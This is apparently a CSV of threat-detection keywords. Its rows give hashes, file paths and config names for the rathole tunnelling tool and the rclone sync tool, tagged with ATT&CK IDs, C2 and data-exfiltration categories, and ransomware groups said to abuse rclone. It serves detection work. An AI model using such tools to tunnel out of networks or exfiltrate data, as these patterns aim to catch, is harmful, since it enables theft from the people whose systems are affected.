"*fee22f170cba77a8a17614c87621393e45ca2d703c049ca5e352083f0c9dd313*",".{0,1000}fee22f170cba77a8a17614c87621393e45ca2d703c049ca5e352083f0c9dd313.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*fef39ed9d25e944711e2a27d5a9c812163ab184bf3f703827fca6bbf54504fbf*",".{0,1000}fef39ed9d25e944711e2a27d5a9c812163ab184bf3f703827fca6bbf54504fbf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*rapiz1/rathole*",".{0,1000}rapiz1\/rathole.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*rathole config.toml*",".{0,1000}rathole\sconfig\.toml.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*rathole server.toml*",".{0,1000}rathole\sserver\.toml.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ratholec-mem.log*",".{0,1000}ratholec\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ratholes-mem.log*",".{0,1000}ratholes\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*.configrclonerclone.conf*",".{0,1000}\.configrclonerclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*.rclone.exe config*",".{0,1000}\.rclone\.exe\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone.conf*",".{0,1000}\/rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone.exe*",".{0,1000}\/rclone\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone.git*",".{0,1000}\/rclone\.git.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone.rar*",".{0,1000}\/rclone\.rar.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone.zip*",".{0,1000}\/rclone\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/rclone/releases/download/*",".{0,1000}\/rclone\/releases\/download\/.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/usr/bin/rclone*",".{0,1000}\/usr\/bin\/rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*/usr/share/doc/rclone/*",".{0,1000}\/usr\/share\/doc\/rclone\/.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\.config\rclone\*",".{0,1000}\\\.config\\rclone\\.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\AppData\Roaming\rclone*",".{0,1000}\\AppData\\Roaming\\rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\AppData\Roaming\rclone\rclone.conf*",".{0,1000}\\AppData\\Roaming\\rclone\\rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\rclone.conf*",".{0,1000}\\rclone\.conf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\rclone.exe*",".{0,1000}\\rclone\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\rclone.old.exe*",".{0,1000}\\rclone\.old\.exe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\rclone.rar*",".{0,1000}\\rclone\.rar.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*\rclone.zip*",".{0,1000}\\rclone\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*>rclone.exe<*",".{0,1000}\>rclone\.exe\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*>Rclone<*",".{0,1000}\>Rclone\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#productname","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*>Rsync for cloud storage<*",".{0,1000}\>Rsync\sfor\scloud\sstorage\<.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#description","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0005a6d6647dd4120f2365c330a0b4acbb345630c40621fb91b5947598503cb0*",".{0,1000}0005a6d6647dd4120f2365c330a0b4acbb345630c40621fb91b5947598503cb0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0008726b00bc9205dcd5681256ef79f185282892f3992614ff4264cb7b0d04fb*",".{0,1000}0008726b00bc9205dcd5681256ef79f185282892f3992614ff4264cb7b0d04fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0040e6c313caa468a8706e3311c534f87d9f56f3353ab50bdc48c9f972f8fac0*",".{0,1000}0040e6c313caa468a8706e3311c534f87d9f56f3353ab50bdc48c9f972f8fac0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*007249202d5840829342cc6597fbff75d446910027417b1d49e94c7485774c7a*",".{0,1000}007249202d5840829342cc6597fbff75d446910027417b1d49e94c7485774c7a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*009c223ca93f5c176828097e0a0931547b79a1e893d77897daca58e82d87813f*",".{0,1000}009c223ca93f5c176828097e0a0931547b79a1e893d77897daca58e82d87813f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*00d485a13e0db43cacbb8a66316906b18356c8e0aed5821d7d26f077943f431e*",".{0,1000}00d485a13e0db43cacbb8a66316906b18356c8e0aed5821d7d26f077943f431e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*00e40aa1125ab7a0c1ea059168555ac4ea15c2d08b7a3361feea0b285f2cf4fc*",".{0,1000}00e40aa1125ab7a0c1ea059168555ac4ea15c2d08b7a3361feea0b285f2cf4fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*00ea56c041ca5b97b56e70c48d26d77f71774c1c19611af9db6626baaa382404*",".{0,1000}00ea56c041ca5b97b56e70c48d26d77f71774c1c19611af9db6626baaa382404.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*012323674405ca9b97010e222bdd25204eda6b772a8e6e571f946ad35eeaf87b*",".{0,1000}012323674405ca9b97010e222bdd25204eda6b772a8e6e571f946ad35eeaf87b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*014ff0ec700476b19f252a02a43ff70cfc91c29479bb0a59ac21e91d58b4f89c*",".{0,1000}014ff0ec700476b19f252a02a43ff70cfc91c29479bb0a59ac21e91d58b4f89c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*017d3fc6d2c17249a9bf202e115670ed440cdcc9efdb4e23b998cbb3b3dcde96*",".{0,1000}017d3fc6d2c17249a9bf202e115670ed440cdcc9efdb4e23b998cbb3b3dcde96.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0180d8d7b89b3eb0d6a64dad6278fab176a3a5de3507d78ebf242081bf8af491*",".{0,1000}0180d8d7b89b3eb0d6a64dad6278fab176a3a5de3507d78ebf242081bf8af491.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*018350a14e058689eccc58449351dec1d7a63dae2aca0ddec64630e2cc6feb83*",".{0,1000}018350a14e058689eccc58449351dec1d7a63dae2aca0ddec64630e2cc6feb83.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*01b403992457bd8e1bb0d9e3cc353d6196c975d4fe5674a43ee7c807ae669fbd*",".{0,1000}01b403992457bd8e1bb0d9e3cc353d6196c975d4fe5674a43ee7c807ae669fbd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*01b54786c5362c33e97cfd3262d62077b0f8aa6205eebd560832e55796acf1b3*",".{0,1000}01b54786c5362c33e97cfd3262d62077b0f8aa6205eebd560832e55796acf1b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
